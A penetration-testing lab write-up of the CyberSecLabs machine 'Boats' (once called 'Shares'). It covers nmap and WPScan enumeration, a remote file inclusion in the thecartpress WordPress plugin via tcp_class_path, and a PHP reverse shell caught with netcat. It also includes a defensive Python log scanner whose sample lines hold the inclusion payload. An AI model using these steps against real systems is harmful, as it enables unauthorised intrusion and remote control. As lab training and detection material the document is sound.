This is my third write-up, and I will be discussing my experience with the machine “Boats” from CyberSecLabs. CyberSecLabs is a great platform for people who are starting out with penetration testing. Shares was a pretty easy Windows box. The WordPress plugin thecartpress was found to be vulnerable, leading to a Remote File Inclusion (RFI).
Step 1: Enumeration
I kicked off with an Nmap scan and jumped right in. My first scan used the default scripts (-sC) and version detection (-sV). The second scan gave me pretty much the same results.
sudo nmap -sC -sV 172.31.1.14
I always work from top to bottom when looking at my ports and reading my results. I visited the web page and ran some web enumeration scans, but found nothing interesting. Going back to my Nmap results, the WordPress version 4.0.1 caught my attention. I ran WPScan, a great tool bundled with Kali that scans for WordPress vulnerabilities.
sudo wpscan --url http://172.31.1.14/
Looking at the scan results, I noticed that the thecartpress plugin was outdated.
Step 2: Exploitation
I then googled the plugin name thecartpress along with the word exploit, and bam! The first hit was an Exploit-DB entry titled “Thecartpress Wordpress plugin RFI”.
Looking at the exploit, I appended this path to the URL http://172.31.1.14/
The resulting error confirmed the Remote File Inclusion (RFI).
My focus was on the variable tcp_class_path in the URL, because this is where the file to fetch from my machine and execute would be referenced.
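From the defender's side, the request pattern just described (a query parameter such as tcp_class_path carrying a URL to another host) is easy to pick out of a web server's access log. The following Python script is an added example, not code from the original write-up or from the plugin, and it generalizes the check to every query parameter rather than only tcp_class_path. The log lines, client addresses and the PLACEHOLDER.php script name are constructed for the example; the write-up elides the plugin's actual script path.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" log format (not taken from the
# original write-up). PLACEHOLDER.php stands in for the plugin script whose
# name the write-up elides; 10.0.0.99 is a made-up attacker-controlled host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2020:13:55:36 +0000] "GET /wp-content/plugins/thecartpress/PLACEHOLDER.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2020:13:56:01 +0000] "GET /wp-content/plugins/thecartpress/PLACEHOLDER.php?tcp_class_path=http://10.0.0.99/shell.txt HTTP/1.1" 200 1024 "-" "curl/7.68.0"
10.0.0.7 - - [10/Oct/2020:13:56:30 +0000] "GET /wp-content/plugins/thecartpress/PLACEHOLDER.php?tcp_class_path=%2F%2F10.0.0.99%2Fshell.txt HTTP/1.1" 500 0 "-" "curl/7.68.0"
10.0.0.8 - - [10/Oct/2020:13:57:10 +0000] "GET /index.php?p=42&lang=en HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2020:13:58:00 +0000] "GET /wp-content/plugins/thecartpress/PLACEHOLDER.php?tcp_class_path=checkout HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request
# target and status code are all we need for this check.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A value that starts with "scheme://" or with a bare "//" (protocol-relative
# URL, or a UNC path once backslashes are normalised) points at another host.
REMOTE_REF = re.compile(r'^(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)


def is_remote_reference(value: str) -> bool:
    """True when a parameter value refers to a resource on another host."""
    normalised = value.strip().replace("\\", "/")
    return bool(REMOTE_REF.match(normalised))


def parse_line(line: str):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def detect_rfi(log_text: str, watched_params=("tcp_class_path",)):
    """Scan access-log text and return one finding per query parameter whose
    value is a remote reference. watched_params marks parameters already known
    to be used for file inclusion (tcp_class_path comes from the write-up)."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        # parse_qsl percent-decodes values, so %2F%2F becomes // before the check.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if is_remote_reference(value):
                findings.append({
                    "client": rec["ip"],
                    "time": rec["ts"],
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    "status": int(rec["status"]),
                    "known_vulnerable_param": name in watched_params,
                })
    return findings


def summarize(findings):
    """Count findings per client address, useful for prioritising follow-up."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = detect_rfi(SAMPLE_LOG)
    for h in hits:
        flag = "KNOWN PARAM" if h["known_vulnerable_param"] else "generic"
        print(f"{h['time']} {h['client']} {h['path']} {h['param']}={h['value']} "
              f"status={h['status']} [{flag}]")
    print("per client:", summarize(hits))
```

Only the two requests from 10.0.0.7 are reported: the plain http:// URL and the percent-encoded protocol-relative form, which parse_qsl decodes before the check runs. The benign request with tcp_class_path=checkout and the unrelated index.php request produce no finding. A 200 status on such a request is the one to chase first, since it means the include most likely succeeded.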
Well, I knew this machine runs PHP on Windows, so I googled for a Windows PHP reverse shell and found this bad boy on GitHub.
The repository describes itself as a simple PHP reverse shell implemented using a binary, based on a webshell; usage: change the IP and port in the…
I cloned the shell onto my machine, opened the file in Vim, and changed the IP to the one assigned to my tun0 adapter.
Next, I needed netcat running to receive the incoming connection from the shell, and Python's SimpleHTTPServer so I could serve the shell file. Make sure the shell file is in the same directory you run SimpleHTTPServer from, or it will not be served.
First terminal window:
nc -lvp 1234
Second terminal window:
sudo python -m SimpleHTTPServer 80
Back on my Kali box, netcat showed the reverse connection, giving me access to the victim machine as Admin.